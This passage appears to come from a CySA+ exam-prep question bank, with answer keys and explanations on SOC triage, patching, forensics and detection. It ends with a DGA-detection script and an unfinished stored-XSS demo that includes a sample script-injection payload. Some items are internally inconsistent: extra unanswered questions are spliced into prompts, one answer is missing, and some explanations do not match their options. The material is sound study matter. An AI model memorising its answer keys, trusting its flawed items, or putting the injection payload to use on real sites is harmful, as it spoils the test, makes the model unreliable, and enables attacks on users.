Option A is wrong because running only unauthenticated scans forever would miss critical vulnerabilities that require authenticated access (e.g., local privilege escalation, missing patches), violating best practices for comprehensive vulnerability management. Option B is wrong because disabling SSH on all servers would break remote administration and defeat the purpose of scanning; SSH is the standard secure remote access protocol, and disabling it is not a viable remediation. Option C is wrong because assuming hosts have no vulnerabilities after a scan failure is a dangerous assumption; the scan failure indicates a configuration issue, not an absence of vulnerabilities, and could lead to unpatched systems being exploited.

847
MCQ · medium

A vendor shares indicators marked TLP:AMBER+STRICT. How should the SOC handle them?

A. Publish the indicators on a public GitHub repository
B. Send the indicators to all customers
C. Ignore the indicators because TLP markings are optional
D. Use them internally with only people who need to know and avoid wider redistribution
Answer: D

TLP:AMBER+STRICT restricts sharing to the recipient organisation on a need-to-know basis.

Why this answer

TLP:AMBER+STRICT restricts sharing to recipients within the organization who need to know, prohibiting further redistribution outside the organization. The SOC must use these indicators internally only with personnel who require them for detection and response, avoiding any external sharing. This ensures compliance with the Traffic Light Protocol (TLP) standard defined by FIRST.org.

Exam trap

CompTIA often tests the misconception that TLP markings are optional or advisory. They are not laws, but they are handling instructions the recipient accepts as a condition of receiving the intelligence; the STRICT qualifier (TLP 2.0) removes the allowance that plain AMBER gives for sharing with clients, limiting disclosure to the recipient organization itself.

How to eliminate wrong answers

Option A is wrong because publishing indicators on a public GitHub repository violates the TLP:AMBER+STRICT restriction, which forbids any sharing outside the organization. Option B is wrong because sending indicators to all customers is redistribution beyond the recipient organization; plain AMBER would allow sharing with clients on a need-to-know basis, and STRICT is the qualifier that takes that allowance away. Option C is wrong because ignoring a TLP marking breaks the trust on which the sharing relationship depends, will usually breach the organization's own information-handling policy, and can cut off future intelligence from that source.

848
MCQ · hard

A security analyst is performing memory acquisition on a compromised Linux server using LiME. The analyst needs to capture the memory image with minimal impact on the system. Which of the following parameters should the analyst use to ensure the output is forensically sound?

A. Use the --digest option to calculate a SHA256 hash during acquisition
B. Specify a format that compresses the output to reduce size
C. Ensure the output path is on a write-blocked device
D. Use the --reload option to reload the original kernel module after acquisition
Answer: C

The image must be written to media other than the compromised host's own storage, so that the acquisition does not overwrite evidence.

Why this answer

The exam's intended point is that the memory image must never be written to the evidence disk: send it to dedicated removable media or, with LiME, across the network (path=tcp:<port> on the target, with a listener such as netcat on the collector) so the compromised system's storage is not modified during acquisition. Read the option literally and it does not work as stated: a device that is truly write-blocked cannot receive the image at all, so in practice the output goes to separate evidence media that is write-protected and hashed only after the capture completes. Note also that LiME's parameters are passed as key=value arguments to insmod rather than as -- flags, and that its digest= parameter (for example digest=sha256) writes a hash of the captured image alongside it; that hash is what lets the image be verified later, so on a real acquisition you would use both a separate output target and digest=.

849
MCQ · hard

A security team is implementing a patch management process for a large enterprise. They must ensure that patches are tested before deployment to production. The team has a staging environment that mirrors production. During patch testing, they discover that a critical security patch for a database server causes a performance degradation of 30% in a key application. What should the team do next?

A. Skip the patch and rely on existing security controls.
B. Apply the patch to production immediately because it fixes a critical vulnerability.
C. Contact the vendor for a fix or workaround, and implement compensating controls in the meantime.
D. Deploy the patch to a subset of production servers to test performance.
Answer: C

This addresses both the vulnerability and the performance issue.

Why this answer

The patch is critical but causes performance issues. The best approach is to work with the vendor for a resolution or apply compensating controls until a fix is available. Applying the patch blindly may disrupt operations, while skipping it leaves the vulnerability unaddressed.

850
Multi-Select (medium)

Which THREE of the following are essential tools and technologies used in a Security Operations Center (SOC) for monitoring and detection?

Select 3 answers
A. Firewall
B. Endpoint Detection and Response (EDR)
C. Intrusion Detection/Prevention System (IDS/IPS)
D. Security Information and Event Management (SIEM) system
E. Vulnerability scanner
Answers: B, C, D

EDR provides host-level monitoring and detection.

Why this answer

Endpoint Detection and Response (EDR) is essential in a SOC because it provides continuous monitoring and analysis of endpoint activities, enabling detection of advanced threats such as fileless malware and ransomware. EDR tools collect telemetry data from endpoints, correlate it with threat intelligence, and allow for automated response actions, which are critical for real-time incident detection and investigation.

Exam trap

CompTIA often tests the distinction between tools that provide continuous monitoring and detection (SIEM, EDR, IDS/IPS) versus tools that are preventive or periodic (firewall, vulnerability scanner), leading candidates to incorrectly include the latter as essential SOC monitoring technologies.

851
Multi-Select (medium)

An organization is experiencing a distributed denial-of-service (DDoS) attack targeting its web servers. The incident response team is implementing containment strategies. Which TWO actions are appropriate for short-term containment of a DDoS attack? (Choose TWO.)

Select 2 answers
A. Rerouting traffic through a DDoS mitigation service or scrubbing center
B. Disabling the accounts of the attackers
C. Applying a security patch to the web server software
D. Rebuilding the web servers from clean images
E. Blocking the attacking IP addresses at the firewall
Answers: A, E

Scrubbing centers filter malicious traffic before it reaches the origin.

Why this answer

Short-term containment for DDoS includes blocking attack traffic at the network perimeter and diverting traffic via a scrubbing center. Patching servers does not stop the attack, and rebuilding is recovery.

852
MCQ (hard)

During a forensic investigation, an analyst finds a suspicious registry key that runs a program at startup. What is the best way to determine if the program is malicious?

A. Search the startup folder for the file
B. Compute the hash of the executable and query threat intelligence
C. Execute the program in a sandbox and observe behavior
D. Check the file's last modified timestamp
Answer: B

Hash check indicates known malicious status.

Why this answer

Computing the hash of the executable and querying threat intelligence (e.g., VirusTotal, AlienVault OTX) provides a definitive, objective indicator of known maliciousness by comparing the file's cryptographic fingerprint against global threat databases. This is the fastest and most reliable method to determine if the program is malicious without risking execution or relying on circumstantial evidence.

Exam trap

The CS0-003 exam often tests the distinction between 'best first step' and 'thorough analysis'—candidates mistakenly choose sandbox execution (Option C) because it seems more comprehensive, but the exam prioritizes speed and safety via hash-based threat intelligence queries.

How to eliminate wrong answers

Option A is wrong because searching the startup folder only confirms the file's location, not its maliciousness; legitimate programs also reside there. Option C is wrong because executing the program in a sandbox, while useful for behavioral analysis, is time-consuming and could still expose the system to risk if the sandbox is misconfigured; it is not the 'best' first step. Option D is wrong because the last modified timestamp is metadata that can be easily altered (timestomping) and provides no indication of malicious intent.

853
MCQ (hard)

A container workload unexpectedly starts a shell, mounts the host filesystem, and attempts outbound connections to an unknown IP. Which telemetry is MOST useful? In the containment trade-off phase, which response balances containment with evidence preservation?

A. Only physical datacenter access logs
B. Container runtime events, Kubernetes audit logs, and network flow from the pod
C. Only monthly vulnerability scan summaries
D. Only user password age reports
Answer: B

Runtime, orchestration, and network telemetry together show process execution, privilege context, and external communication.

Why this answer

Option B is correct because container runtime events (e.g., Docker/containerd exec logs) capture the unexpected shell launch, Kubernetes audit logs record the pod creation and mount operations, and network flow logs (e.g., NetFlow, eBPF-based tools) reveal the outbound connection to the unknown IP. Together, these provide the granular, real-time telemetry needed to detect and investigate the compromise, unlike static or coarse-grained logs.

Exam trap

The CS0-003 exam often tests the misconception that any single log source (e.g., only network flows or only audit logs) is sufficient, when in reality container compromises require correlating runtime, orchestration, and network telemetry to fully understand the attack chain.

How to eliminate wrong answers

Option A is wrong because physical datacenter access logs only track physical entry and have no visibility into container-level activities like shell execution, filesystem mounts, or outbound network flows. Option C is wrong because monthly vulnerability scan summaries are point-in-time snapshots of known CVEs and cannot capture dynamic runtime events such as a shell spawning or live network connections. Option D is wrong because user password age reports are identity management artifacts unrelated to runtime container behavior or network telemetry.

854
MCQ (easy)

A security analyst is reviewing NetFlow data and notices a significant amount of traffic from an internal host to a known malicious IP address on port 443. What tool would be most effective for further analyzing the payload of this traffic?

A. Nikto
B. Wireshark
C. Nmap
D. tcpdump
Answer: B

Wireshark provides detailed packet inspection and payload analysis.

Why this answer

Wireshark captures and analyzes packet payloads, which is necessary for examining the content of encrypted or unencrypted traffic.

855
Multi-Select (medium)

What should be included in incident scoping for ransomware? (Choose three.)

Select 3 answers
A. Initial infected host and user context
B. The brand of office chairs near the server room
C. Backup integrity and last known clean restore point
D. Shares or systems touched by the compromised account
Answers: A, C, D

The starting point helps identify root cause.

Why this answer

Option A is correct because identifying the initial infected host and user context is critical for understanding the attack vector, containing the threat, and preventing further spread. In ransomware incidents, the first compromised system often reveals the entry point (e.g., phishing email, RDP brute force) and the user account used, which helps scope the blast radius and prioritize remediation.

Exam trap

The CS0-003 exam often tests the ability to filter out irrelevant physical or administrative details (like office chairs) that distract from the core technical scoping steps required in incident response.

856
MCQ (easy)

Which of the following is the primary purpose of log normalisation in a SIEM?

A. Encrypt logs to protect confidentiality
B. Reduce storage space by compressing log data
C. Remove false positives from log entries
D. Convert logs into a standardised format for correlation and analysis
Answer: D

Normalisation ensures consistent field names and values across diverse log sources.

Why this answer

Log normalisation converts logs from different sources into a common, structured format so that the SIEM can correlate and analyse them uniformly.

857
MCQ (hard)

A security analyst uses Wireshark to capture traffic and notices an unusually high number of DNS queries for random-looking subdomains under a single domain, such as 'a1b2c3.malicious.com'. The TTL values are very low. The analyst suspects DNS tunneling. Which of the following additional indicators would most strongly support this hypothesis?

A. Large number of NXDOMAIN responses
B. DNS queries with unusually large TXT record response sizes
C. High number of A record queries
D. Queries originating from a DNS server
Answer: B

Large TXT records are a common sign of data exfiltration via DNS tunneling.

Why this answer

DNS tunneling often uses TXT records to encode data, and the packet sizes can be larger than normal DNS queries.

858
MCQ (easy)

A supplier provides a software product used in a regulated environment. The security team wants visibility into included libraries and versions. What should they request? For stakeholder management, which documentation or approval is required to keep the programme defensible?

A. A software bill of materials
B. A building floor plan
C. A password complexity screenshot only
D. A DNS MX record report
Answer: A

An SBOM lists software components and versions, supporting dependency risk analysis.

Why this answer

A Software Bill of Materials (SBOM) is a formal, machine-readable inventory (often in SPDX or CycloneDX format) that lists all third-party libraries, their versions, and dependencies. In a regulated environment, this provides the security team with the visibility needed to assess vulnerabilities (e.g., Log4Shell) and ensure compliance with standards like NIST SP 800-53 or FDA cybersecurity guidance. Requesting an SBOM is the standard practice for supply chain risk management.

Exam trap

The CS0-003 exam often tests the distinction between operational security artifacts (like password policies or DNS records) and the specific supply chain documentation (SBOM) required for software composition analysis, leading candidates to confuse general security controls with component inventory.

How to eliminate wrong answers

Option B is wrong because a building floor plan is a physical security document unrelated to software library inventory or version tracking. Option C is wrong because a password complexity screenshot only verifies a single authentication policy, not the composition of included libraries and their versions. Option D is wrong because a DNS MX record report lists mail exchange servers for email routing, not software components or their versions.

859
Multi-Select (hard)

An organization has identified a ransomware outbreak on several workstations. Which TWO actions should the incident response team take immediately?

Select 2 answers
A. Pay the ransom to recover data quickly.
B. Disconnect all network shares to prevent encryption.
C. Contact law enforcement for guidance.
D. Reimage all affected systems immediately.
E. Isolate the affected workstations from the network.
Answers: B, E

Prevents ransomware from encrypting shared data.

Why this answer

Isolating affected systems prevents further spread, and disconnecting network shares stops lateral movement. Contacting law enforcement can be done later; paying ransom is not recommended; reimaging may destroy evidence before investigation.

860
MCQ (medium)

A scan of Windows servers reports few findings, but the scanner used no credentials. The security manager suspects missing patch data. What should be changed? For tool configuration, which scanner or pipeline change most directly improves result quality?

A. Increase only the port range
B. Trust the unauthenticated result as complete
C. Run authenticated scans using least-privilege scanner credentials
D. Disable host firewalls permanently
Answer: C

Authenticated scanning gives the scanner access to installed software and patch state, improving accuracy.

Why this answer

Unauthenticated scans rely on network-visible services and banners, which miss registry-level patch data, OS configuration details, and installed updates. Authenticated scans with least-privilege credentials (e.g., using WMI, WinRM, or the Windows Update API) provide deep visibility into missing patches by querying the actual patch database (e.g., via the Microsoft Update Catalog or WSUS). This directly addresses the security manager's suspicion of missing patch data, making option C the correct choice.

Exam trap

The CS0-003 exam often tests the misconception that increasing scan scope (ports, protocols) or disabling firewalls can substitute for proper authentication, when in fact only credentialed scanning provides the access needed to assess patch levels accurately.

How to eliminate wrong answers

Option A is wrong because increasing the port range only expands the number of ports scanned for open services; it does not enable credential-based access to patch information, so missing patch data remains invisible. Option B is wrong because trusting unauthenticated results as complete ignores the fundamental limitation that unauthenticated scans cannot access registry, file system, or WMI data needed to verify patch levels, leading to false negatives. Option D is wrong because disabling host firewalls permanently is an insecure and drastic measure that does not grant the scanner the necessary privileges to read patch data; it only removes network-level access controls, not the authentication requirement.

861
Multi-Select (medium)

Which three of the following are effective techniques for prioritizing vulnerabilities for remediation in a vulnerability management program? (Choose three.)

Select 3 answers
A. Applying the Common Vulnerability Scoring System (CVSS) base score as the sole prioritization metric
B. Correlating vulnerabilities with active exploit campaigns and threat intelligence feeds
C. Using asset criticality ratings derived from business impact analysis (BIA)
D. Prioritizing vulnerabilities based solely on the age of the CVE
E. Incorporating compensating controls that may reduce the effective risk of a vulnerability
F. Focusing remediation efforts exclusively on vulnerabilities with a CVSS score of 9.0 or higher

Why this answer

Correlating vulnerabilities with active exploit campaigns and threat intelligence feeds is effective because it prioritizes vulnerabilities that are currently being exploited in the wild, which directly reduces the risk of a breach. This approach aligns remediation with real-world attacker behavior rather than theoretical severity.

Exam trap

CompTIA often tests the misconception that CVSS base scores alone are sufficient for prioritization, when in fact they must be combined with asset criticality, threat context, and compensating controls to reflect true organizational risk.

862
MCQ (hard)

A security analyst is investigating a containerized environment. A scan using Trivy has identified a critical vulnerability in a container image. The container is running in a Kubernetes cluster with a Pod Security Policy that disallows privileged containers. Which additional concern should the analyst address?

A. The vulnerability is not exploitable due to the Pod Security Policy
B. The vulnerability is automatically mitigated because the container is not privileged
C. The analyst should ignore the vulnerability because the container is not privileged
D. The analyst should immediately patch the image, but also verify that the Pod Security Policy prevents privilege escalation
Answer: D

Patching is required, and the Pod Security Policy reduces impact.

Why this answer

Even if the container image has a vulnerability, the Pod Security Policy reduces risk by preventing privilege escalation. The analyst should ensure that the exploit cannot gain additional privileges due to the policy.

863
Multi-Select (hard)

A vulnerability management analyst is prioritizing vulnerabilities for remediation. The analyst has the following information for three vulnerabilities: CVE-2023-1: CVSS 9.8, EPSS 0.9, asset criticality high; CVE-2023-2: CVSS 7.5, EPSS 0.01, asset criticality low; CVE-2023-3: CVSS 5.0, EPSS 0.8, asset criticality medium. According to best practices, which THREE factors should the analyst consider when prioritizing? (Select THREE)

Select 3 answers
A. CVSS score
B. CVE publication date
C. Asset criticality
D. EPSS score
E. Number of vendors affected
Answers: A, C, D

Severity is a key factor.

Why this answer

Prioritization should consider severity (CVSS), likelihood of exploitation (EPSS), and asset criticality. KEV is not mentioned in the data. Patch complexity and vendor reputation are secondary considerations but not primary factors in this context.

864
MCQ (medium)

A legacy system cannot be patched because the vendor no longer supports the application. What should the vulnerability manager request? For control selection, which control best addresses the stated weakness without hiding risk?

A. Mark the vulnerability as fixed
B. Documented risk acceptance with compensating controls and a migration/remediation plan
C. Remove the system from future reports
D. Give all users local admin rights
Answer: B

Unsupported systems need formal exception handling, mitigation, ownership, and an exit path.

Why this answer

When a legacy system cannot be patched due to vendor end-of-life, the vulnerability manager must formally document the risk acceptance, implement compensating controls (e.g., network segmentation, host-based firewall rules, or application whitelisting), and create a migration or remediation plan to eventually retire or replace the system. This approach transparently acknowledges the residual risk rather than hiding it, aligning with the principle of risk treatment as defined in NIST SP 800-53 and ISO 27005.

Exam trap

The CS0-003 exam often tests the misconception that removing a system from reports or marking it as fixed is an acceptable shortcut, when in fact the correct process requires formal risk acceptance with compensating controls and a documented plan.

How to eliminate wrong answers

Option A is wrong because marking a vulnerability as 'fixed' when no patch has been applied is a false status that misrepresents the actual risk posture and violates vulnerability management policy. Option C is wrong because removing the system from future reports hides the risk from stakeholders and bypasses the necessary risk acceptance process, which is a security governance failure. Option D is wrong because granting all users local admin rights would increase the attack surface and privilege escalation risk, directly contradicting the principle of least privilege and making the system even more vulnerable.

865
Multi-Select (hard)

A SOC team is tuning a SIEM to reduce false positives. Which THREE of the following metrics should the team consider when evaluating detection effectiveness? (Choose THREE)

Select 3 answers
A. False Positive Rate
B. Number of detected events
C. Precision
D. Mean Time to Detect (MTTD)
E. True Positive Rate (Recall)
Answers: A, C, E

Measures the proportion of negatives incorrectly flagged as positive.

Why this answer

A is correct because False Positive Rate (FPR) measures the proportion of benign events incorrectly flagged as malicious, directly indicating how much noise the SIEM generates. Reducing FPR is a primary goal when tuning detection rules to minimize analyst fatigue and improve alert fidelity.

Exam trap

CompTIA often tests the distinction between metrics that measure detection accuracy (FPR, Precision, Recall) versus metrics that measure operational efficiency (MTTD, event volume), leading candidates to mistakenly include MTTD or raw event counts as effectiveness metrics.

866
MCQ (medium)

A UEBA rule flags a user authenticating from London and Singapore within 12 minutes, followed by a mailbox forwarding rule creation. What should the analyst investigate first? In the alert triage phase, which action gives the analyst the clearest next triage step?

A. Only the user's browser cache
B. The organisation's public DNS zone file
C. Sign-in logs, MFA result, device details, and mailbox audit events
D. Only DHCP logs from the London office
Answer: C

Impossible travel plus forwarding rule creation is a strong account-compromise pattern; identity and mailbox audit data confirm whether the activity is malicious.

Why this answer

Option C is correct because the alert indicates a potential account compromise (impossible travel from London to Singapore in 12 minutes) followed by a suspicious mailbox rule creation. The clearest next triage step is to examine sign-in logs for authentication source IPs and timestamps, MFA result to verify if the second factor was passed, device details to check for known or managed devices, and mailbox audit events to confirm who created the forwarding rule and when. This combination directly validates whether the user's credentials were used from two geographically impossible locations and whether the mailbox rule was created by the legitimate user or an attacker.

Exam trap

The CS0-003 exam often tests the concept that during alert triage, the analyst must correlate multiple log sources (authentication, MFA, device, and mailbox audit) rather than focusing on a single, irrelevant log type like DHCP or DNS, which do not provide the necessary evidence for impossible travel and mailbox rule investigations.

How to eliminate wrong answers

Option A is wrong because browser cache only stores local web data (cookies, history) and cannot provide evidence of authentication source IPs, MFA status, or mailbox rule creation events; it is irrelevant for investigating impossible travel and mailbox forwarding. Option B is wrong because the organization's public DNS zone file contains DNS records (A, MX, CNAME) for external resolution and has no relation to user authentication logs, MFA results, or mailbox audit events; it cannot help triage the alert. Option D is wrong because DHCP logs from the London office only record IP address assignments within that subnet and do not include authentication details, MFA results, or mailbox audit events; they cannot confirm the user's identity or the mailbox rule creation.

867
Multi-Select (medium)

Which pipeline controls help prevent vulnerable dependencies reaching production? (Choose two.)

Select 2 answers
A. SBOM generation and review for released builds
B. Manual badge checks at the office door
C. Software composition analysis with policy gates
D. DNS MX record rotation
Answers: A, C

SBOMs support dependency tracking and downstream risk review.

Why this answer

A is correct because SBOM (Software Bill of Materials) generation and review provides a detailed inventory of all components in a build, enabling teams to identify and block vulnerable dependencies before release. This aligns with supply chain security best practices, as SBOMs allow automated comparison against vulnerability databases (e.g., NVD) to enforce policy gates early in the pipeline.

Exam trap

The CS0-003 exam often tests the distinction between pipeline-level controls (automated, code-focused) and physical or administrative controls, so candidates may mistakenly select a non-technical option like badge checks because they confuse 'pipeline' with general security procedures.

868
MCQ (easy)

The CISO asks whether incident response is improving quarter over quarter. Which metric is most relevant? If the primary audience is the SOC manager, which content choice is most appropriate?

A. Mean time to detect, mean time to respond, containment time, and recurrence rate
B. Number of desktop wallpapers changed
C. Number of unused dashboards
D. Total coffee consumed by analysts
Answer: A

These KPIs show detection and response effectiveness over time. The report should be tuned to the SOC manager while preserving factual accuracy.

Why this answer

Mean time to detect (MTTD), mean time to respond (MTTR), containment time, and recurrence rate are the core operational metrics that directly measure the effectiveness and efficiency of an incident response program. For a SOC manager assessing quarter-over-quarter improvement, these metrics provide actionable insight into detection speed, response agility, containment effectiveness, and whether incidents are being fully remediated to prevent repeats.

Exam trap

The CS0-003 exam often tests the distinction between operational incident response metrics and irrelevant administrative or cosmetic metrics, trapping candidates who confuse 'activity tracking' with 'performance measurement'.

How to eliminate wrong answers

Option B is wrong because the number of desktop wallpapers changed is an endpoint configuration or user-experience metric, not an incident response performance indicator; it has no bearing on detection, response, or containment. Option C is wrong because the number of unused dashboards is a reporting tool hygiene metric, irrelevant to measuring incident response maturity or improvement over time.

869
MCQ (easy)

A vulnerability scan report shows a critical finding with a CVSS score of 9.8. The system is a web server behind a WAF that blocks the attack vector. What should the analyst do?

A. Report the finding as a false positive
B. Re-run the scan with credentials
C. Patch the server immediately
D. Document the WAF as a compensating control and accept the risk
Answer: D

Compensating controls reduce risk.

Why this answer

A compensating control (WAF) may mitigate the risk. The analyst should document it and adjust the risk rating accordingly.

870
Multi-Select (hard)

A security analyst is reviewing an alert from Azure Sentinel that indicates a possible privilege escalation attempt. The alert is based on a correlation rule that detects unusual usage of the 'Add-AzKeyVaultKey' cmdlet by a user who has never used it before. The analyst needs to validate the alert and determine if the activity is malicious. Which THREE actions should the analyst take?

Select 3 answers
A. Check the user's role assignments and permissions
B. Run a vulnerability scan on the user's workstation
C. Review the Key Vault's diagnostic logs for any key retrieval after the cmdlet
D. Disable the user account immediately
E. Verify the user's identity by checking Azure AD sign-in logs
Answers: A, C, E

Understanding the user's privileges helps assess if the action is within scope.

Why this answer

Checking Azure AD logs for the authentication context, reviewing the user's recent activity history, and examining the Key Vault audit logs for any subsequent access are all relevant steps.

871
MCQ (medium)

A threat hunter is creating a hypothesis based on the MITRE ATT&CK framework. The hunter wants to detect adversaries using PowerShell to download files from remote servers. Which ATT&CK technique should the hunter focus on?

A. T1078 (Valid Accounts)
B. T1053.005 (Scheduled Task)
C. T1047 (WMI)
D. T1059.001 (PowerShell)
Answer: D

PowerShell is the technique for executing commands and downloading files.

Why this answer

T1059.001 is PowerShell, which is commonly used for file downloads. The hunter should create detection rules for PowerShell download cradles.

872
MCQ (medium)

An organization uses MISP (Malware Information Sharing Platform) to share threat intelligence with trusted partners. Which of the following standards is commonly used by MISP to structure and exchange threat intelligence data?

A. NetFlow
B. SNMP
C. STIX/TAXII
D. Syslog
Answer: C

STIX and TAXII are open standards for threat intelligence sharing, widely used in MISP.

Why this answer

STIX (Structured Threat Information Expression) and TAXII (Trusted Automated Exchange of Indicator Information) are standards for exchanging cyber threat intelligence. MISP supports STIX and TAXII for sharing.

873
MCQ (easy)

After a high-priority SOC escalation, file shares show rapid encryption and ransom-note creation from one workstation. What is the best immediate containment action? During containment, which decision is most defensible? Which response best matches incident-response practice?

A. Run vulnerability scans on every subnet first
B. Restore backups before isolating the host
C. Email all users the ransom note
D. Isolate the workstation and disable its active sessions to file servers
Answer: D

Containment should stop encryption spread while preserving evidence for analysis. In containment, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because the immediate priority in a ransomware incident is to contain the threat by isolating the infected workstation from the network to prevent further encryption of file shares. Disabling active sessions to file servers (e.g., using SMB session termination or firewall rules) stops the lateral movement and encryption of shared data. This aligns with the NIST SP 800-61 containment strategy, which prioritizes stopping the spread before any other action.

Exam trap

The CS0-003 exam often tests the misconception that you should run scans or restore backups first; the trap is that immediate containment (isolation) is always the priority to stop the spread, ahead of investigation or recovery.

How to eliminate wrong answers

Option A is wrong because running vulnerability scans on every subnet first wastes critical time during an active ransomware outbreak; scanning does not stop ongoing encryption and is a post-containment step. Option B is wrong because restoring backups before isolating the host would allow the ransomware to continue encrypting newly restored files, and backups should only be used after containment to ensure a clean restore point. Option C is wrong because emailing all users the ransom note is not a containment action; it may cause panic, spread misinformation, and does not stop the encryption process.

874
MCQ (hard)

A development team wants to find vulnerable open-source libraries before deployment. Which control best fits this stage? For validation, which action should be taken before closing or downgrading the finding?

A. Wireless spectrum analysis
B. Database transaction log backups
C. Software composition analysis in the CI/CD pipeline
D. Physical badge access reviews
Answer: C

SCA identifies vulnerable third-party dependencies and can gate builds before release.

Why this answer

Software composition analysis (SCA) is the correct control because it specifically scans open-source libraries and their dependencies for known vulnerabilities (CVEs) and license compliance issues. Integrating SCA into the CI/CD pipeline ensures that vulnerable libraries are identified automatically before the code is deployed, aligning with the shift-left security principle.

Exam trap

The CS0-003 exam often tests the distinction between vulnerability identification (SCA) and operational controls (backups, spectrum analysis), leading candidates to confuse general security practices with the specific need for open-source library scanning.

How to eliminate wrong answers

Option A is wrong because wireless spectrum analysis is used to detect rogue access points, interference, or unauthorized wireless devices, not to analyze software libraries. Option B is wrong because database transaction log backups are a data recovery and integrity measure, not a method for identifying vulnerabilities in open-source code.

875
MCQ (hard)

A security analyst is reviewing DNS logs and notices that a workstation is making frequent queries to domains with random-looking strings, such as 'a3b9f2d1.example.com'. These domains resolve to different IP addresses each time. Which type of activity is most likely being observed?

A. Normal DNS caching behavior
B. A misconfigured DNS resolver
C. DNS tunneling
D. Domain generation algorithm (DGA) usage
Answer: D

Random-looking domains that change frequently are characteristic of DGA.

Why this answer

Domain Generation Algorithms (DGAs) produce large batches of random-looking domain names from a seed (often the date), and the malware queries them until it finds one the operator has registered. Because the set changes every day, static blocklists lag behind, which is why this behavior is typical of malware command and control. Tell-tale signs in DNS logs are many high-entropy labels from one host, a high NXDOMAIN ratio (most generated names are never registered), and the occasional name that does resolve. DNS tunneling (option C) also produces odd names, but it encodes data in long, frequently changing subdomains under one stable attacker-controlled domain and usually involves TXT or NULL record queries, which is not the pattern described here.
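Worked example, added here and not part of the original question set: a small scorer that runs the DGA heuristics above over a constructed DNS log. The log lines, client addresses and thresholds are invented for the example; the thresholds in particular should be tuned against a baseline of your own benign traffic before use.

```python
import math
from collections import defaultdict

# Constructed DNS query log for this example (client, queried name, response code); not real telemetry.
DNS_LOG = [
    ("10.0.0.15", "www.example.com", "NOERROR"),
    ("10.0.0.15", "a3b9f2d1.example.com", "NXDOMAIN"),
    ("10.0.0.15", "k7x2qz9w.example.com", "NXDOMAIN"),
    ("10.0.0.15", "p0m4vd8t.example.com", "NOERROR"),   # one generated name resolved: the live C2
    ("10.0.0.15", "zq81wt3n.example.com", "NXDOMAIN"),
    ("10.0.0.15", "j5c6rb2y.example.com", "NXDOMAIN"),
    ("10.0.0.22", "mail.example.com", "NOERROR"),
    ("10.0.0.22", "accounts.google.com", "NOERROR"),
    ("10.0.0.22", "login.microsoftonline.com", "NOERROR"),
]

VOWELS = set("aeiou")

def shannon_entropy(s: str) -> float:
    """Bits per character; algorithmically generated labels score close to log2(len)."""
    if not s:
        return 0.0
    freq = defaultdict(int)
    for ch in s:
        freq[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in freq.values())

def leftmost_label(name: str) -> str:
    return name.lower().rstrip(".").split(".")[0]

def label_features(label: str) -> dict:
    letters = [c for c in label if c.isalpha()]
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters) if letters else 0.0
    digit_ratio = sum(c.isdigit() for c in label) / len(label) if label else 0.0
    return {"entropy": round(shannon_entropy(label), 3), "vowel_ratio": round(vowel_ratio, 3),
            "digit_ratio": round(digit_ratio, 3), "length": len(label)}

def looks_generated(label: str, entropy_min: float = 2.8, vowel_max: float = 0.3) -> bool:
    """Heuristic: high entropy plus few vowels. Thresholds are assumptions for this example;
    CDN and cloud hostnames are the usual false positives, so allow-list them in practice."""
    if len(label) < 6:
        return False
    f = label_features(label)
    return f["entropy"] >= entropy_min and f["vowel_ratio"] <= vowel_max

def score_hosts(log, min_hits: int = 3) -> dict:
    """Per-client counts of DGA-like labels and NXDOMAIN answers. One odd name is noise;
    several per host together with a high NXDOMAIN ratio is the DGA pattern."""
    stats = defaultdict(lambda: {"queries": 0, "dga_like": 0, "nxdomain": 0})
    for client, name, rcode in log:
        s = stats[client]
        s["queries"] += 1
        if looks_generated(leftmost_label(name)):
            s["dga_like"] += 1
        if rcode == "NXDOMAIN":
            s["nxdomain"] += 1
    return {c: s for c, s in stats.items() if s["dga_like"] >= min_hits}

if __name__ == "__main__":
    for client, s in score_hosts(DNS_LOG).items():
        print(f"{client}: {s['dga_like']}/{s['queries']} DGA-like labels, {s['nxdomain']} NXDOMAIN")
```

Run against the constructed log, only 10.0.0.15 is reported; the host that finally got a NOERROR answer for a generated name is the one to pull EDR data from first.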

876
MCQhard

A threat hunter is creating a Sigma rule to detect a specific TTP where an attacker uses reg.exe to create a Run key for persistence. Which of the following Sigma rule event selectors would best detect this activity?

A.EventID: 4688 (Process Creation) AND ParentImage: '*reg.exe*'
B.EventID: 13 (Registry Value Set) AND TargetObject: '*\CurrentVersion\Run*'
C.EventID: 4657 (Registry modification) AND ObjectName: '*\RunOnce*'
D.EventID: 1 (Process Creation) AND CommandLine: '*reg.exe*'
AnswerB

Directly detects registry value writes to the Run key.

Why this answer

Registry persistence via Run keys is achieved by writing a value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run (or the HKLM equivalent, and the RunOnce siblings). A Sigma rule on registry_set events (Sysmon Event ID 13) whose TargetObject contains that path catches the write no matter which tool made it: reg.exe, PowerShell, a dropper, or an installer. Option D fires on every legitimate reg.exe invocation and never sees the key. Option A is wrong on two counts: 4688 is a process-creation event, and reg.exe would be the Image, not the parent. Option C would work only if SACL auditing were enabled on the key, and it covers RunOnce alone.

877
Multi-Selecthard

A web application DAST scan reports stored XSS. Which evidence helps confirm exploitability? (Choose two.)

Select 2 answers
A.Payload persists and executes when another user views the affected page
B.The vulnerable parameter and output encoding context are identified
C.The server has a large disk
D.The application uses HTTPS
AnswersA, B

Stored execution against another user validates impact.

Why this answer

Option A is correct because stored XSS is confirmed exploitable only when the injected payload (e.g., <script>alert(1)</script>) is persistently stored on the server (e.g., in a database or file) and then rendered and executed in the browser of another user who views the affected page. This demonstrates that the attack can impact victims beyond the tester, proving the vulnerability is not self-inflicted or limited to the attacker's session. Option B is correct because knowing the vulnerable parameter and the output encoding context (HTML body, attribute, JavaScript string, URL) is what lets the tester craft a payload that executes in that context and lets developers apply the right encoding; it turns a generic scanner hit into a reproducible, fixable finding.

Exam trap

The CS0-003 exam often tests the distinction between identifying a vulnerability's context (Option B) and actually proving it is exploitable (Option A), leading candidates to confuse analysis steps with exploitation evidence.
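Worked example, added here and not part of the original question set: a toy comment store that reproduces the two pieces of evidence above. The vulnerable renderer concatenates stored input into an HTML body context; the fixed one applies encoding for that context. A canary payload is stored as one user and the page is rendered as another user, and the result records whether the payload persisted and whether it reached the second user's page unencoded. The store, users and payload are all constructed for the example.

```python
import html

# In-memory comment store standing in for the application's database (constructed for this example).
COMMENTS = []

def store_comment(author: str, text: str) -> None:
    COMMENTS.append({"author": author, "text": text})

def render_vulnerable() -> str:
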